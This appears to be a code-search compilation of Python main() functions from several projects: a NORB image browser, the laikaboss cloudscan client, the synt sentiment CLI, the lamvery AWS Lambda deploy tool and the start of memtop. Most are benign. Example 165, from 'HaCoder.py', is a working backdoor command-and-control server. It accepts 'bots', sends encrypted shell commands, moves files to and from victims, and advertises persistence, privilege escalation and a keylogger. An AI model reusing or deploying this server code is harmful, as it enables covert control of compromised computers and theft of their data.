    def on_key_press(event):

        def add_mod(arg, step, size):
            return (arg + size + step) % size

        def incr_index_type(step):
            num_dimensions = len(grid_indices)
            if dataset.y.shape[1] > 5:
                # If dataset is big NORB, add one for the image index
                num_dimensions += 1

            grid_dimension[0] = add_mod(grid_dimension[0],
                                        step,
                                        num_dimensions)

        def incr_index(step):
            assert step in (0, -1, 1), ("Step was %d" % step)

            image_index = (blank_image_index
                           if is_blank(grid_indices)
                           else object_image_index)

            if grid_dimension[0] == 5:  # i.e. the image index
                row_indices = get_row_indices(grid_indices)
                if row_indices is None:
                    image_index[0] = 0
                else:
                    # increment the image index
                    image_index[0] = add_mod(image_index[0],
                                             step,
                                             len(row_indices))
            else:
                # increment one of the grid indices
                gd = grid_dimension[0]
                grid_indices[gd] = add_mod(grid_indices[gd],
                                           step,
                                           len(grid_to_short_label[gd]))

                row_indices = get_row_indices(grid_indices)
                if row_indices is None:
                    image_index[0] = 0
                else:
                    # some grid indices have 2 images instead of 3.
                    image_index[0] = min(image_index[0], len(row_indices))

        # Disables left/right key if we're currently showing a blank,
        # and the current index type is neither 'category' (0) nor
        # 'image number' (5)
        disable_left_right = (is_blank(grid_indices) and
                              not (grid_dimension[0] in (0, 5)))

        if event.key == 'up':
            incr_index_type(-1)
            redraw(True, False)
        elif event.key == 'down':
            incr_index_type(1)
            redraw(True, False)
        elif event.key == 'q':
            sys.exit(0)
        elif not disable_left_right:
            if event.key == 'left':
                incr_index(-1)
                redraw(True, True)
            elif event.key == 'right':
                incr_index(1)
                redraw(True, True)

    figure.canvas.mpl_connect('key_press_event', on_key_press)
    figure.canvas.mpl_connect('motion_notify_event', on_mouse_motion)
    redraw(True, True)

    pyplot.show()

Example 163

Project: laikaboss Source File: cloudscan.py
def main():

    parser = OptionParser(usage="usage: %prog [options] (/path/to/file | stdin)")
    parser.add_option("-d", "--debug",
                      action="store_true",
                      dest="debug",
                      help="enable debug messages to the console.")
    parser.add_option("-r", "--remove-limit",
                      action="store_true",
                      dest="nolimit",
                      help="disable 20mb size limit (be careful!)")
    parser.add_option("-t", "--timeout",
                      action="store", type="int",
                      dest="timeout",
                      help="adjust request timeout period (in seconds)")
    parser.add_option("-c", "--config-path",
                      action="store", type="string",
                      dest="config_path",
                      help="specify a path to cloudscan.conf.")
    parser.add_option("-a", "--address",
                      action="store", type="string",
                      dest="broker_host",
                      help="specify an IP and port to connect to the broker")
    parser.add_option("-f", "--file-list",
                      action="store", type="string",
                      dest="file_list",
                      help="Specify a list of files to scan")
    parser.add_option("-s", "--ssh-host",
                      action="store", type="string",
                      dest="ssh_host",
                      help="specify a host for the SSH tunnel")
    parser.add_option("-p", "--num-procs",
                      action="store", type="int", default=6,
                      dest="num_procs",
                      help="Specify the number of processors to use for recursion")
    parser.add_option("-u", "--source",
                      action="store", type="string",
                      dest="source",
                      help="specify a custom source")
    parser.add_option("--ssh",
                      action="store_true",
                      default=False,
                      dest="use_ssh",
                      help="Use SSH tunneling")
    parser.add_option("-l", "--level",
                      action="store", type="string",
                      dest="return_level",
                      help="Return Level: minimal, metadata, full [default: metadata]")
    parser.add_option("-o", "--out-path",
                      action="store", type="string",
                      dest="save_path",
                      help="If Return Level Full has been specified, provide a path to "
                            "save the results to [default: current directory]")
    parser.add_option("-b", "--buffer",
                      action="store_true",
                      dest="stdin_buffer",
                      help="Specify to allow a buffer to be collected by stdin.")
    parser.add_option("-e", "--ephID",
                      action="store", type="string",
                      dest="ephID", default="",
                      help="Specify an ephID to send to Laika.")
    parser.add_option("-m", "--ext-metadata",
                      action="store",
                      dest="ext_metadata",
                      help="Specify external metadata to be passed into the scanner.")
    parser.add_option("-z", "--log",
                      action="store_true",
                      dest="log_db",
                      help="Specify to turn on logging results.")
    parser.add_option("-R", "--recursive",
                      action="store_true",
                      default=False,
                      dest="recursive",
                      help="Enable recursive directory scanning. If enabled, all files "
                            "in the specified directory will be scanned. Results will "
                            "be output to cloudscan.log in the current directory.")
    (options, args) = parser.parse_args()


    # Define default configuration location
    CONFIG_PATH = "/etc/laikaboss/cloudscan.conf"

    if options.config_path:
        CONFIG_PATH = options.config_path
    
    Config = ConfigParser.ConfigParser()
    Config.read(CONFIG_PATH)

    # Parse through the config file and append each section to a single dictionary
    global configs
    for section in Config.sections():
        configs.update(dict(Config.items(section)))

    # Set the working path, this will be used for file ouput if another
    # path is not specified
    WORKING_PATH = os.getcwd()

    if options.use_ssh:
        USE_SSH = True
    else: 
        if strtobool(getConfig('use_ssh')):
            USE_SSH = True
        else:
            USE_SSH = False

    if options.ssh_host:
        SSH_HOST = options.ssh_host
    else:
        SSH_HOST = getConfig('ssh_host')
        
    if options.broker_host:
        BROKER_HOST = options.broker_host
    else:
        BROKER_HOST = getConfig('broker_host')
 
    if options.debug:
        logging.basicConfig(level=logging.DEBUG)

    logging.debug("Host: %s" % BROKER_HOST)

    if options.return_level:
        RETURN_LEVEL = options.return_level
    else:
        RETURN_LEVEL = getConfig('return_level')

    if options.source:
        SOURCE = options.source
    else:
        SOURCE = "cloudscan"

    if not options.log_db:
        SOURCE += "-nolog"
     
    if options.save_path:
        SAVE_PATH = options.save_path
    else:
        SAVE_PATH = WORKING_PATH
    
    if options.num_procs:
        num_procs = int(options.num_procs)
    else:
        num_procs = int(getConfig('num_procs'))

    if options.timeout:
        logging.debug("default timeout changed to %i" % options.timeout)
        REQUEST_TIMEOUT = options.timeout * 1000
    else:
        REQUEST_TIMEOUT = int(getConfig('request_timeout'))

    if options.ext_metadata:
        try:
            if os.path.exists(options.ext_metadata):
                with open(options.ext_metadata) as metafile:
                    ext_metadata = json.loads(metafile.read())
            else:
                ext_metadata = json.loads(options.ext_metadata)
            assert isinstance(ext_metadata, dict)
        except:
            print "External Metadata must be a dictionary!"
            sys.exit(0)
    else:
        ext_metadata = dict()

    REQUEST_RETRIES = int(getConfig('request_retries'))
    
    # Attempt to get the hostname
    try:
        hostname = gethostname().split('.')[0] 
    except:
        hostname = "none"

    
    # Attempt to set the return level, throw an error if it doesn't exist.
    try:
        return_level = globals()["level_%s" % RETURN_LEVEL]
    except KeyError as e:
        print "Please specify a valid return level: minimal, metadata or full"
        sys.exit(1)

    if not options.recursive:
        try:
            file_buffer = ''
            # Try to read the file

            if len(args) > 0:
                file_buffer = open(args[0], 'rb').read()
                file_len = len(file_buffer)
                logging.debug("opened file %s with len %i" % (args[0], file_len))
            else:
                while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                    line = sys.stdin.readline()
                    if not line:
                        break
                    else:
                        file_buffer += line

                if not file_buffer:
                    parser.print_usage()
                    sys.exit(1)
                
                file_len = len(file_buffer)

            if file_len > 20971520 and not options.nolimit:
                print "You're trying to scan a file larger than 20mb.. Are you sure?"
                print "Use the --remove-limit flag if you really want to do this."
                sys.exit(1)
        except IOError as e:
            print "\nERROR: The file does not exist: %s\n" % (args[0],)
            sys.exit(1)
    else:
        try:
            fileList = []
            if options.file_list:
                fileList = open(options.file_list).read().splitlines()
            else:
                if len(args) > 0:
                    rootdir = args[0]
                    for root, subFolders, files in os.walk(rootdir):
                        for fname in files:
                            fileList.append(os.path.join(root, fname))
                else:
                    while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                        line = sys.stdin.readline()
                        if not line:
                            break
                        else:
                            fileList.append(line)
                    if not fileList:
                        parser.print_usage()
                        sys.exit(1)

            
            if len(fileList) > 1000 and not options.nolimit:
                print "You're trying to scan over 1000 files... Are you sure?"
                print "Use the --remove-limit flag if you really want to do this."
                sys.exit(1)

        except IOError as e:
            print "\nERROR: Directory does not exist: %s\n" % (args[0],)
            sys.exit(1)


   
    if not options.recursive: 
        # Construct the object to be sent for scanning
        if args:
            filename = args[0]
        else:
            filename = "stdin"

        ext_metadata['server'] = hostname
        ext_metadata['user'] = getpass.getuser()
        externalObject = ExternalObject(buffer=file_buffer, 
                                        externalVars=ExternalVars(filename=filename, 
                                                                  ephID=options.ephID,
                                                                  extMetaData=ext_metadata,
                                                                  source="%s-%s-%s" % (SOURCE,
                                                                         hostname,
                                                                         getpass.getuser())),
                                        level=return_level)
    try:
        if not options.recursive:
            # Set up ZMQ context 
            if USE_SSH:
                try:
                    logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
                    client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST, useGevent=True)
                except RuntimeError as e:
                    logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
                    sys.exit(1)
            else:
                logging.debug("SSH has been disabled.")
                client = Client(BROKER_HOST, useGevent=True)

            starttime = time.time()
            result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
            logging.debug("got reply in %s seconds" % str(time.time() - starttime))
            if result:
                rootObject = getRootObject(result)
                try:
                    jsonResult = getJSON(result)
                    print jsonResult
                except:
                    logging.exception("error occured collecting results")
                    return
                if return_level == level_full:
                    SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
                    if not os.path.exists(SAVE_PATH):
                        try:
                            os.makedirs(SAVE_PATH)
                            print "\nWriting results to %s...\n" % SAVE_PATH
                        except (OSError, IOError) as e:
                            print "\nERROR: unable to write to %s...\n" % SAVE_PATH
                            return
                    else:
                        print "\nOutput folder already exists! Skipping results output...\n"
                        return
                    for uid, scanObject in result.files.iteritems():
                        f = open("%s/%s" % (SAVE_PATH, uid), "wb")
                        f.write(scanObject.buffer)
                        f.close()
                        try:
                            if scanObject.filename and scanObject.parent:
                                linkPath = "%s/%s" % (SAVE_PATH, scanObject.filename.replace("/","_"))
                                if not os.path.lexists(linkPath):
                                    os.symlink("%s" % (uid), linkPath)
                            elif scanObject.filename:
                                filenameParts = scanObject.filename.split("/")
                                os.symlink("%s" % (uid), "%s/%s" % (SAVE_PATH, filenameParts[-1]))
                        except:
                            print "Unable to create symlink for %s" % (uid)

                    f = open("%s/%s" % (SAVE_PATH, "results.log"), "wb")
                    f.write(jsonResult)
                    f.close()
                    sys.exit(1)
            else:
                print "ERROR: No result received (scan timed out)"
                return
        else:
            try:
                fh = open('cloudscan.log', 'w')
                fh.close()
            except:
                pass

            for fname in fileList:
                job_queue.put(fname)

            for i in range(num_procs):
                job_queue.put("STOP")

            print "File list length: %s" % len(fileList)

            for i in range(num_procs):
                Process(target=worker, args=(options.nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST,ext_metadata,options.ephID,)).start()
   
            results_processed = 0
            while results_processed < len(fileList):
                logging.debug("Files left: %s" % ((len(fileList) - results_processed)))
                resultText = result_queue.get()
                try:
                    # Process results
                    fh = open('cloudscan.log', 'ab')
                    fh.write('%s\n' % resultText)
                    fh.close()
                    results_processed += 1
                except Exception as e:
                    raise

            print 'Wrote results to cloudscan.log'

    except KeyboardInterrupt:
        print "Interrupted by user, exiting..."
        sys.exit(1)

Example 164

Project: synt Source File: __init__.py
def main():

    if not os.path.exists(config.SYNT_PATH):
        os.makedirs(config.SYNT_PATH)

        #copy user config for first time run
        if not os.path.exists(config.USER_CONFIG_PATH):
            user_config = os.path.join(config.PROJECT_PATH, 'user_config.py')
            target_config = config.USER_CONFIG_PATH
            shutil.copy(user_config, target_config)

            print("First time run created a config in ~/.synt that Synt will use. Please make sure everything is ok then re-run your previous commands.")
            return

    parser = argparse.ArgumentParser(description='Tool to interface with synt, provides a way to train, collect and guess from the command line.')
    subparsers = parser.add_subparsers(dest='parser')

    #Train Parser
    train_parser = subparsers.add_parser(
        'train',
        help='Train a classifier.'
    )
    train_parser.add_argument(
        'db_name',
        help="The name of the training database to use. They are stored/retreived from ~/.synt/"
    )
    train_parser.add_argument(
        'samples',
        type=int,
        help="The amount of samples to train on. Uses the samples.db",
    )
    train_parser.add_argument(
        '--classifier_type',
        default='naivebayes',
        choices=('naivebayes',),
        help="The classifier to use. See help for currently supported classifier.",
    )
    train_parser.add_argument(
        '--extractor_type',
        default='stopwords',
        choices=('words', 'stopwords', 'bestwords'),
        help="The feature extractor to use. By default this uses stopwords filtering.",
    )
    train_parser.add_argument(
        '--best_features',
        type=int,
        default=0,
        help="The amount of best words to use, or best features. This should be used in conjunction with bestwords extractor.",
    )
    train_parser.add_argument(
        '--purge',
        default='no',
        choices=('yes', 'no'),
        help="Yes to purge the redis database. By default no."
    )
    train_parser.add_argument(
        '--processes',
        default=4,
        help="Will utilize multiprocessing if available with this number of processes. By default 4."
    )

    #Collect parser
    d = datetime.datetime.now()
    db_name = "samples-%s-%s-%s.db" % (d.year, d.month, d.day)

    collect_parser = subparsers.add_parser(
        'collect',
        help='Collect samples.'
    )
    collect_parser.add_argument(
        '--db_name',
        default=db_name,
        help="Optional database name to store as.",
    )
    collect_parser.add_argument(
        '--commit_every',
        default=200,
        type=int,
        help="Write to sqlite database after every 'this number'. Default is 200",
    )
    collect_parser.add_argument(
        '--max_collect',
        default=2000000,
        type=int,
        help="The amount to stop collecting at. Default is 2 million",
    )
    collect_parser.add_argument(
        '--query_file',
        default='',
        type=str,
        help="Absolute path to query file to use.",
    )

    #Fetch parser
    fetch_parser = subparsers.add_parser(
        'fetch',
        help='Fetches premade sample database.'
    )
    fetch_parser.add_argument(
        '--db_name',
        help="Fetches the default samples database from github and stores it as 'db' in ~/.synt/. Default db name is 'samples.db'.",
        default='samples.db',
    )

    #Guess parser
    guess_parser = subparsers.add_parser(
        'guess',
        help='Guess sentiment'
    )
    guess_parser.add_argument(
        'guess',
        nargs='?',
        default=True,
        help="Starts the guess prompt.",
    )
    guess_parser.add_argument(
        '--text',
        default='',
        help="Given text, will guess the sentiment on it.",
    )

    #Accuracy parser
    accuracy_parser = subparsers.add_parser(
        'accuracy',
        help="Test accuracy of classifier.",
    )
    accuracy_parser.add_argument(
        '--db_name',
        default='',
        help="""The samples database to use, if left empty the same database that was used for training is used for testing (with fresh samples). Specify db with with a database name located in ~/.synt.""",
    )
    accuracy_parser.add_argument(
        '--test_samples',
        type=int,
        help="""The amount of samples to test on. By default this is figured out internally and amounts to 25%
        of the training sample count. You can override this.""",
        default=0,
    )
    accuracy_parser.add_argument(
        '--neutral_range',
        default=0.2,
        type=float,
        help="Neutral range to use. By default this is 0.2.",
    )
    accuracy_parser.add_argument(
        '--offset',
        default=0,
        type=int,
        help="""By default the test samples are taken from the offset of the trained samples. i.e if 100 samples are trained and we
        are testing on 25 it will start from 100-125 to ensure the testing samples are new. You can override what offset to use
        with this argument.""",
    )

    args = parser.parse_args()

    if args.parser == 'train':
        print("Beginning train on {} database with {} samples.".format(args.db_name, args.samples))

        start = time.time()

        purge = False
        if args.purge == 'yes':
            purge = True

        train(
            db_name         = args.db_name,
            samples         = args.samples,
            classifier_type = args.classifier_type,
            extractor_type  = args.extractor_type,
            best_features   = args.best_features,
            processes       = args.processes,
            purge           = purge,
        )

        print("Finished training in {}.".format(time.time() - start))

    elif args.parser == 'collect':
        print("Beginning collecting {} samples to {}.".format(args.max_collect, args.db_name))

        start = time.time()

        collect(
            db_name      = args.db_name,
            commit_every = args.commit_every,
            max_collect  = args.max_collect,
            query_file   = args.query_file,
        )

        print("Finished collecting samples in {} seconds.".format(time.time() - start))

    elif args.parser == 'fetch':
        print("Beginning fetch to '{}' database.".format(args.db_name))
        fetch(args.db_name)
        print("Finished fetch.")

    elif args.parser == 'guess':
        g = Guesser()

        if args.text:
            print("Guessed: ",  g.guess(args.text))
            sys.exit()

        print("Enter something to calculate the synt of it!")
        print("Press enter to quit.")

        while True:
            text = raw_input("synt> ")
            if not text:
                break
            print('Guessed: {}'.format(g.guess(text)))

    elif args.parser == 'accuracy':
        print("Beginning accuracy test with neutral range {}.".format(args.neutral_range))

        start = time.time()

        n_accur, m_accur, classifier = test_accuracy(
            db_name       = args.db_name,
            test_samples  = args.test_samples,
            neutral_range = args.neutral_range,
            offset        = args.offset,
        )

        print("NLTK Accuracy: {}".format(n_accur))
        print("Manual Accuracy: {}".format(m_accur))

        classifier.show_most_informative_features(50)

        print("Finished testing in {} seconds.".format(time.time() - start))

Example 165

Project: HaCoder.py Source File: HaCoder.py
def globalhandler():
	# clear function
	##################################
	# Windows ---------------> cls
	# Linux   ---------------> clear
	if os.name == 'posix': clf = 'clear'
	if os.name == 'nt': clf = 'cls'
	clear = lambda: os.system(clf)
	clear()

	BLOCK_SIZE=32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
	DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

	# initialize socket
	c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	c.bind(('0.0.0.0', portH))
	c.listen(128)

	# client information
	active = False
	clients = []
	socks = []
	interval = 0.8

	# Functions
	###########

	# send data
	def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
		sock.sendall(EncodeAES(cipher, cmd + end))

	# receive data
	def Receive(sock, end="EOFEOFEOFEOFEOFX"):
		data = ""
		l = sock.recv(1024)
		while(l):
			decrypted = DecodeAES(cipher, l)

			data += decrypted
			if data.endswith(end) == True:
				break
			else:
				l = sock.recv(1024)
		return data[:-len(end)]

	# download file
	def download(sock, remote_filename, local_filename=None):
		# check if file exists
		if not local_filename:
			local_filename = remote_filename
		try:
			f = open(local_filename, 'wb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "download "+remote_filename)
		print "Downloading: " + remote_filename + " > " + local_filename
		fileData = Receive(sock)
		f.write(fileData)
		time.sleep(interval)
		f.close()
		time.sleep(interval)

	# upload file
	def upload(sock, local_filename, remote_filename=None):
		# check if file exists
		if not remote_filename:
			remote_filename = local_filename
		try:
			g = open(local_filename, 'rb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "upload "+remote_filename)
		print 'Uploading: ' + local_filename + " > " + remote_filename
		while True:
			fileData = g.read()
			if not fileData: break
			Send(sock, fileData, "")
		g.close()
		time.sleep(interval)
		Send(sock, "")
		time.sleep(interval)
	
	# refresh clients
	def refresh():
		clear()
		print bcolors.OKGREEN + '\nListening for bots...\n' + bcolors.ENDC
		if len(clients) > 0:
			for j in range(0,len(clients)):
				print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
		else:
			print "...\n"
		# print exit option
		print "---\n"
		print bcolors.FAIL + "[0] Exit \n" + bcolors.ENDC
		print bcolors.WARNING + "\nPress Ctrl+C to interact with client." + bcolors.ENDC
		print bcolors.OKGREEN

	# main loop
	while True:
		refresh()
		# listen for clients
		try:
			# set timeout
			c.settimeout(10)
		
			# accept connection
			try:
				s,a = c.accept()
			except socket.timeout:
				continue
		
			# add socket
			if (s):
				s.settimeout(None)
				socks += [s]
				clients += [str(a)]
		
			# display clients
			refresh()
		
			# sleep
			time.sleep(interval)

		except KeyboardInterrupt:
		
			# display clients
			refresh()
		
			# accept selection --- int, 0/1-128
			activate = input("\nEnter option: ")
		
			# exit
			if activate == 0:
				print '\nExiting...\n'
				for j in range(0,len(socks)):
					socks[j].close()
				sys.exit()
		
			# subtract 1 (array starts at 0)
			activate -= 1
	
			# clear screen
			clear()
		
			# create a cipher object using the random secret
			cipher = AES.new(secret)
			print '\nActivating client: ' + clients[activate] + '\n'
			print "download	Download files from Client"
			print "downhttp	Download file to victim using HTTP"
			print "upload		Upload files from attacker to Client"
			print "persist		Make backdoor run on startup"
			print "privs		Privilege Escalation"
			print "keylog		Activate Keylogger"

			active = True
			Send(socks[activate], 'Activate')
		print bcolors.ENDC
		# interact with client
		while active:
			try:
				# receive data from client
				data = Receive(socks[activate])
			# disconnect client.
			except:
				print '\nClient disconnected... ' + clients[activate]
				# delete client
				socks[activate].close()
				time.sleep(0.8)
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				refresh()
				active = False
				break

			# exit client session
			if data == 'quitted':
				# print message
				print "Exit.\n"
				# remove from arrays
				socks[activate].close()
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				# sleep and refresh
				time.sleep(0.8)
				refresh()
				active = False
				break
			# if data exists
			elif data != '':
				# get next command
				sys.stdout.write(data)
				nextcmd = raw_input()
		
			# download
			if nextcmd.startswith("download ") == True:
				if len(nextcmd.split(' ')) > 2:
					download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					download(socks[activate], nextcmd.split(' ')[1])
		
			# upload
			elif nextcmd.startswith("upload ") == True:
				if len(nextcmd.split(' ')) > 2:
					upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					upload(socks[activate], nextcmd.split(' ')[1])
		
			# normal command
			elif nextcmd != '':
				Send(socks[activate], nextcmd)

			elif nextcmd == '':

				print 'Think before you type. ;)\n'

Example 166

Project: lamvery Source File: cli.py
def main():
    alias_args = ('-a', '--alias',)
    alias_kwargs = {
        'help': 'Alias for a version of the function',
        'default': None
    }
    conf_file_args = ('-c', '--conf-file',)
    conf_file_kwargs = {
        'help': 'Configuration YAML file (default: .lamvery.yml)',
        'default': '.lamvery.yml'
    }
    dry_run_args = ('-d', '--dry-run',)
    dry_run_kwargs = {
        'help': 'Dry run',
        'action': 'store_true',
        'default': False
    }
    keep_empty_args = ('-k', '--keep-empty-events',)
    keep_empty_kwargs = {
        'help': 'Keep the event rules that does not have any targets.',
        'action': 'store_true',
        'default': False
    }
    single_file_args = ('-s', '--single-file',)
    single_file_kwargs = {
        'help': 'Only use the main lambda function file',
        'action': 'store_true',
        'default': False
    }
    no_libs_args = ('-l', '--no-libs',)
    no_libs_kwargs = {
        'help': 'Archiving without all libraries',
        'action': 'store_true',
        'default': False
    }
    secret_name_args = ('-n', '--secret-name',)
    secret_name_kwargs = {
        'help': 'The name of the secret value',
        'default': None
    }
    publish_args = ('-p', '--publish')
    publish_kwargs = {
        'help': 'Publish the version as an atomic operation',
        'action': 'store_true',
        'default': False
    }
    store_args = ('-s', '--store',)
    store_kwargs = {
        'help': 'Store encripted value to the configuration file (default: .lamvery.secret.yml)',
        'action': 'store_true',
        'default': False
    }
    version_args = ('-v', '--version',)
    version_kwargs = {
        'help': 'Version of the function',
        'default': None
    }
    follow_args = ('-f', '--follow',)
    follow_kwargs = {
        'help': 'Watch the log events and updates the display (like `tail -f`)',
        'action': 'store_true',
        'default': False
    }
    filter_args = ('-F', '--filter',)
    filter_kwargs = {
        'help': 'Filtering pattern for the log messages',
        'default': None
    }
    interval_args = ('-i', '--interval',)
    interval_kwargs = {
        'help': 'Intervals(seconds) to watch the log events',
        'default': 1
    }
    start_args = ('-s', '--start',)
    start_kwargs = {
        'help': 'Time to start the log events watching',
        'default': None
    }
    target_args = ('-t', '--target',)
    target_kwargs = {
        'help': 'The alias of the version that is targeted for setting alias',
        'default': None
    }
    env_args = ('-e', '--env',)
    env_kwargs = {
        'help': 'Environment variables that pass to the function',
        'action': 'append',
        'default': None
    }
    write_args = ('-w', '--write-id',)
    write_kwargs = {
        'help': 'Write the id of your API to the configuration file (default: .lamvery.api.yml)',
        'action': 'store_true',
        'default': False
    }
    stage_args = ('-s', '--stage',)
    stage_kwargs = {
        'help': 'The name of the stage in API Gateway',
        'default': None
    }
    remove_args = ('-r', '--remove',)
    remove_kwargs = {
        'help': 'Remove your API',
        'action': 'store_true',
        'default': False
    }
    no_integrate_args = ('-n', '--no-integrate',)
    no_integrate_kwargs = {
        'help': 'Without automatic integration',
        'action': 'store_true',
        'default': False
    }
    kind_args = ('-k', '--kind',)
    kind_kwargs = {
        'help': 'The kind of the file # accepts "function"',
        'required': True
    }
    filename_args = ('-n', '--name',)
    filename_kwargs = {
        'help': 'The filename to put the decrypted file in the function environment',
        'required': True
    }

    parser = argparse.ArgumentParser(
        description='Yet another deploy tool for AWS Lambda in the virtualenv environment.',
        epilog='Lamvery version: {}'.format(lamvery.__version__))
    subparsers = parser.add_subparsers(title='subcommands')

    init_parser = subparsers.add_parser(
        'init',
        help='Generate initial configuration file')
    init_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    init_parser.set_defaults(func=init)

    build_parser = subparsers.add_parser(
        'build',
        help='Build and archive your code and libraries to <your-function-name>.zip')
    build_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    build_parser.add_argument(*single_file_args, **single_file_kwargs)
    build_parser.add_argument(*no_libs_args, **no_libs_kwargs)
    build_parser.add_argument(*env_args, **env_kwargs)
    build_parser.set_defaults(func=build)

    set_alias_parser = subparsers.add_parser(
        'set-alias',
        help='Set alias to a version of the function')
    set_alias_parser.add_argument(*alias_args, **alias_kwargs)
    set_alias_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    set_alias_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    set_alias_parser.add_argument(*version_args, **version_kwargs)
    set_alias_parser.add_argument(*target_args, **target_kwargs)
    set_alias_parser.set_defaults(func=set_alias)

    configure_parser = subparsers.add_parser(
        'configure',
        help='Update the remote configuration')
    configure_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    configure_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    configure_parser.set_defaults(func=configure)

    deploy_parser = subparsers.add_parser(
        'deploy',
        help='Deploy your code and libraries,' +
             'Update the remote configuration, Set alias (optional)')
    deploy_parser.add_argument(*alias_args, **alias_kwargs)
    deploy_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    deploy_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    deploy_parser.add_argument(*single_file_args, **single_file_kwargs)
    deploy_parser.add_argument(*no_libs_args, **no_libs_kwargs)
    deploy_parser.add_argument(*publish_args, **publish_kwargs)
    deploy_parser.add_argument(*env_args, **env_kwargs)
    deploy_parser.set_defaults(func=deploy)

    encrypt_parser = subparsers.add_parser('encrypt', help='Encrypt a text value using KMS')
    encrypt_parser.add_argument('text', help='The text value to encrypt')
    encrypt_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    encrypt_parser.add_argument(*secret_name_args, **secret_name_kwargs)
    encrypt_parser.add_argument(*store_args, **store_kwargs)
    encrypt_parser.set_defaults(func=encrypt)

    decrypt_parser = subparsers.add_parser('decrypt', help='Decrypt the secret value using KMS')
    decrypt_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    decrypt_parser.add_argument(*secret_name_args, **secret_name_kwargs)
    decrypt_parser.set_defaults(func=decrypt)

    encrypt_file_parser = subparsers.add_parser('encrypt-file', help='Encrypt a file using KMS')
    encrypt_file_parser.add_argument('path', help='The file path to encrypt')
    encrypt_file_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    encrypt_file_parser.add_argument(*filename_args, **filename_kwargs)
    encrypt_file_parser.add_argument(*store_args, **store_kwargs)
    encrypt_file_parser.set_defaults(func=encrypt_file)

    decrypt_parser = subparsers.add_parser('decrypt', help='Decrypt the secret value using KMS')
    decrypt_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    decrypt_parser.add_argument(*secret_name_args, **secret_name_kwargs)
    decrypt_parser.set_defaults(func=decrypt)

    events_parser = subparsers.add_parser(
        'events',
        help='Configure all events of CloudWatchEvents using the function')
    events_parser.add_argument(*alias_args, **alias_kwargs)
    events_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    events_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    events_parser.add_argument(*keep_empty_args, **keep_empty_kwargs)
    events_parser.set_defaults(func=events)

    invoke_parser = subparsers.add_parser(
        'invoke',
        help='Invoke the function')
    invoke_parser.add_argument(
        'json', default='{}', help='The JSON string or file that pass to the function')
    invoke_parser.add_argument(*alias_args, **alias_kwargs)
    invoke_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    invoke_parser.add_argument(*version_args, **version_kwargs)
    invoke_parser.set_defaults(func=invoke)

    rollback_parser = subparsers.add_parser(
        'rollback',
        help='Rollback your code and libraries')
    rollback_parser.add_argument(*alias_args, **alias_kwargs)
    rollback_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    rollback_parser.add_argument(*version_args, **version_kwargs)
    rollback_parser.set_defaults(func=rollback)

    logs_parser = subparsers.add_parser(
        'logs',
        help="Watch the function's log events on CloudWatch Logs")
    logs_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    logs_parser.add_argument(*follow_args, **follow_kwargs)
    logs_parser.add_argument(*filter_args, **filter_kwargs)
    logs_parser.add_argument(*interval_args, **interval_kwargs)
    logs_parser.add_argument(*start_args, **start_kwargs)
    logs_parser.set_defaults(func=logs)

    api_parser = subparsers.add_parser(
        'api',
        help='Manage your APIs')
    api_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    api_parser.add_argument(*dry_run_args, **dry_run_kwargs)
    api_parser.add_argument(*no_integrate_args, **no_integrate_kwargs)
    api_parser.add_argument(*remove_args, **remove_kwargs)
    api_parser.add_argument(*stage_args, **stage_kwargs)
    api_parser.add_argument(*write_args, **write_kwargs)
    api_parser.set_defaults(func=api)

    gen_parser = subparsers.add_parser(
        'generate',
        help='Ganerate skeleton files')
    gen_parser.add_argument(*conf_file_args, **conf_file_kwargs)
    gen_parser.add_argument(*kind_args, **kind_kwargs)
    gen_parser.set_defaults(func=generate)

    try:
        args = parser.parse_args()
        args.func(args)
        sys.exit(0)
    except Exception as e:
        logging.exception(e)
        sys.exit(colored(str(e), 'red'))

Example 167

Project: memtop Source File: __init__.py
def main():
    global _log, _format, _period, _rows, _firstiteration
    signal.signal(signal.SIGINT, signal_handler)

    oldMemUsage = 0

    check_py_version()

    args = get_parser().parse_args()
    _period = args.period
    verbose = args.verbose
    _log = args.log
    _rows = args.lines
    _format = args.show

    # who am I?
    user = get_command_output("whoami || echo failed")
    user = user.decode()

    # the following two methods are not reliable
    if user == "failed":
        try:
            user = getenv('USER').decode()
